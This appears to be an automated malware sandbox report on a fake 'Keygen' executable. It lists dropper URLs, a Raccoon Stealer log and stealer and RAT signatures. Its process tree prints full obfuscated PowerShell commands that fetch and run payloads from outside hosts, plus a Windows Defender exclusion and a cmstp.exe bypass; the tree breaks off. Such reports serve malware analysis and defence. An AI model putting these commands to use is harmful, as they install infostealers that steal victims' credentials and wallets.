Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    152s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (107) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:57:00 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (793 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 3 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (107) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (107) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:8
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (107) — ?????.exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1004
      • C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1672
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1392
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2292
          • C:\Users\Public\vex.exe
            "C:\Users\Public\vex.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4956
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:5104
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4380
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 4380 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\153281015972590\\* & exit
                  8⤵
                    PID:3012
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 4380
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2708
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:4100
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1464
              • C:\Users\Public\vex.exe
                "C:\Users\Public\vex.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:3076
                • C:\Users\Admin\AppData\Local\Temp\CIo3LmpDP8.exe
                  "C:\Users\Admin\AppData\Local\Temp\CIo3LmpDP8.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4020
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\CIo3LmpDP8.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4168
                • C:\Users\Admin\AppData\Local\Temp\ZS9HVlOqS2.exe
                  "C:\Users\Admin\AppData\Local\Temp\ZS9HVlOqS2.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4828
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:5436
                  • C:\Users\Admin\AppData\Local\Temp\4njuhHymRF.exe
                    "C:\Users\Admin\AppData\Local\Temp\4njuhHymRF.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:2524
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\drrentxv.inf
                      8⤵
                        PID:2536
                    • C:\Users\Admin\AppData\Local\Temp\HbpCU8jR2A.exe
                      "C:\Users\Admin\AppData\Local\Temp\HbpCU8jR2A.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3516
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4312
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\vex.exe"
                      7⤵
                        PID:4884
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:4424
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2124
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:932
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:2464
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4A3D.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3668
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
